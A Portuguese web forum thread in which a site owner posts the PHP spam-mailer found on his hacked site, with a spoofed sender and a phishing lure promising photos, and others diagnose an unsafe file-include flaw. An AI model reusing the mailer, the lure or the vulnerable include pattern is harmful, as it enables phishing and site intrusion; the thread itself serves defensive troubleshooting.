22 replies to this topic

['' sem.Ponto]

Você tem que descobrir onde o problema está, ou seja, o foco que possibilita essas invasões. O que eu posso recomendar para você é perguntar ao provedor de que forma esses arquivos estão sendo upados, como o hacker está logando e o que acontece após você mudar as senhas (se há várias tentativas com a senha antiga, ou força bruta).

Cruzando as respostas, você encontrará o foco do problema.

[kllaus]

Olá pessoal.

Depois de muito tempo o xxxxxx voltou a atacar, eis os novos dados do safado.



O novo Código capturado é:

<?php

set_time_limit(0);

if($manda)
{
//EMAIL DO DESTINAT?RIO
$destinatario = "$remetente";

//ASSUNTO DO EMAIL
$assunto = "$assunto";

//MENSAGEM DO EMAIL
$mensagem = $html;
$mensagem = stripslashes($mensagem);
//CABE?ALHO DO EMAIL
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
/* headers adicionais */
$headers .= "From:<$remetente>\r\n";
$headers .= "Cc: $remetente\r\n";
$headers .= "Bcc: e$remetente\r\n";

//ARQUIVO COM OS EMAILS
$arquivo = $lista;

//LENDO ARQUIVO
$file = explode("\n", $arquivo);
$i = 1;


?><title>spamer priv thundercash</title>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<p>&nbsp;</p>
<?
if($manda) { ?>
<table width="59%" height="30" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="#333333">
  <tr>
	<td bgcolor="#f5f5f5"> 
	  <?
	foreach ($file as $mail) {

				if(mail($mail, $assunto, $mensagem, $headers))

					echo "<font color=green face=verdana size=1>* $i - ".$mail."</font> <font color=green face=verdana size=1>uiauia</font><br>";

				else

					echo "* $i  ".$email[$i]." <font color=red>Não foi!</font><br><hr>";

$i++;
	 

}
}
?>
	</td>
  </tr>
</table><? } ?>
<form name="form1" method="post" action="">
  <table width="47%" height="202" border="0" align="center" cellpadding="0" cellspacing="2" bgcolor="#666666">
	<tr> 
	  <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
		  <tr> 
			<td colspan="3" bgcolor="#636666"> <div align="center"><font color="#FFFFFF" size="4" face="Verdana, Arial, Helvetica, sans-serif"><b> 
				</b></font></div></td>
		  </tr>
		  <tr> 
			<td width="21%"><div align="center"><font color="#4A03000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">ASSUNTO:</font></b></font></div></td>
			<td width="1%" bgcolor="#616666">&nbsp;</td>
			<td width="78%">
			<input name="assunto" type="text" id="assunto3" size="50" value="FOTOS"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A033000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">REMETENTE:</font></b></font></div></td>
			<td bgcolor="#66623666">&nbsp;</td>
			<td>
			<input name="remetente" type="text" id="remetente3" value="notification@live-messenger.com" size="24"></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A10000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">CODIGO HTML:</font></b></font></div></td>
			<td bgcolor="#6666366">&nbsp;</td>
			<td><textarea name="html" cols="30" rows="4" id="textarea2">
<html>
<head>
<p><font face=Arial size=3>Oie!!<br>
tudo bem? eu esqueci de mandar as fotos! agora ta ai!!<br>
Beijao!<br>
<p>anexo:
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto01.jpg (185kb)
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto02.jpg (183kb)
<p><font face=Arial size=3><a href="[ENDEREÇO REMOVIDO]">foto03.jpg (178kb)
</a></font></p>
</body>
</html>

</textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"><font color="#4A0000"><b><font size="2" face="Verdana, Arial, Helvetica, sans-serif">EMAILS:</font></b></font></div></td>
			<td bgcolor="#6666266">&nbsp;</td>
			<td><textarea name="lista" cols="40" rows="10" id="textarea3"></textarea></td>
		  </tr>
		  <tr> 
			<td><div align="center"></div></td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td>&nbsp;</td>
		  </tr>
		  <tr> 
			<td>&nbsp;</td>
			<td bgcolor="#6626666">&nbsp;</td>
			<td><div align="center"> 
				<input name="manda" type="submit" id="manda" value="Send!">
			  </div></td>
		  </tr>
		  <tr> 
			<td height="23">&nbsp;</td>
			<td bgcolor="#6662666">&nbsp;</td>
			<td><div align="center"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
				<b></b></font></div></td>
		  </tr>
		</table></td>
	</tr>
  </table>
</form>

O que leva para o seguinte formulário:




Olhei no DreamWeaver e o código gera o seguinte E-mail:




Alguém tem uma solução?

Edição feita por: '' sem.Ponto, 10/03/2009, 08:38.

['' sem.Ponto]

kllaus,

Daqui eu estou vendo a brecha que você deixou, o site está mal programado. O código para abertura das páginas internas do seu site deve estar mais ou menos assim:

$pagina = $_GET['pagina'];

include $pagina;

Aí para abrir uma página interna, creio que o link fica assim: www.seusite.com.br/index.php?pagina=pagina.php

Estou certo?

Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.

[Patrícia Machado]

Está usando cookies?

O dream weaver realmente ajuda muita coisa, mas não deixe q ele faça todo o trabalho.

[kllaus]

Você tem que verificar o nome antes de liberar a include, senão fica muito inseguro.

Como eu faço isso?

['' sem.Ponto]

Existem várias formas de fazer isso...

Você pode usar apenas condicional, switch, função in_array()...

Qualquer dúvida, poste em PHP.

[kllaus]

Bah... Desisto, agora virou moda essa bagaça...

Quer saber? Apaguei meu site e estou fazendo outro...



Esse primeiro verifiquei, o arquivo windows.txt

Existem várias formas de fazer isso...

Você pode usar apenas condicional, switch, função in_array()...

Qualquer dúvida, poste em PHP.

Agora que percebi uma parada, teu nick é sem.ponto e o site mencionado acima veio através do www.semponto.com.br, por um acaso era tu fazendo isso também?

['' sem.Ponto]

Era eu fazendo testes...

Todos esses aí eu era eu testando, o estranho é que eu não ví "includando" os arquivos.